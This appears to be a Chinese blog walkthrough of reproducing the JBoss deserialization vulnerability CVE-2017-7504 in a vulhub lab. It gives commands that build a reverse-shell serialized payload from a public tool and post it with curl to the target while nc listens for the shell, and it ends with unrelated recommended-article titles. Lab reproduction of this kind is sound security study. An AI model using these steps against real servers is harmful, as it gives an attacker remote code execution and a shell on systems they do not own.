vulhub之jboss(CVE-2017-7504)

复制代码
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的 HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径不一样, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。

JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

环境准备

问题:

端口占用

如果默认的8080端口被占用,可以改为:docker run -p 8080:8081 <image_name>

或者修改docker-compose 端口号

漏洞发现

访问your-ip:8080/jbossmq-httpil/HTTPServerILServlet

如出现以下界面,说明存在此漏洞

漏洞利用

进入攻击机,下载反序列化工具

下载地址:GitHub - ianxtianxt/CVE-2015-7501: (CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞

进入目录执行

1、javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2、java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:监听端口

再用之前生成的.ser文件,通过POST二进制数据上去,使用nc监听端口,即可拿到shell

curl http://目标ip:port/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

相关推荐
mounter6251 小时前
深入解析 RDMA 中的 Address Handler (AH) 缓存:AWS EFA 驱动的硬件演进与软件复用艺术
linux·kernel·rdma·hashtable·hash table·address handle
xixingzhe28 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创8 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
笑锝没心没肺9 小时前
fail2ban工具安装配置及使用
linux·运维·服务器
项目经理老王9 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
大卡片10 小时前
linux内核驱动开发
linux·运维·驱动开发
数据库小学妹11 小时前
KES是什么?国产数据库技术架构、核心能力与选型实战解析
数据库·经验分享·架构·国产数据库·数据库选型·信创数据库
心心喵12 小时前
[linux] nohup和pm2的区别 进程保活
linux·运维·服务器
醉熏的石头13 小时前
Ubuntu 中的编程语言(中)
linux·ubuntu·scala
小李@Free2FA15 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证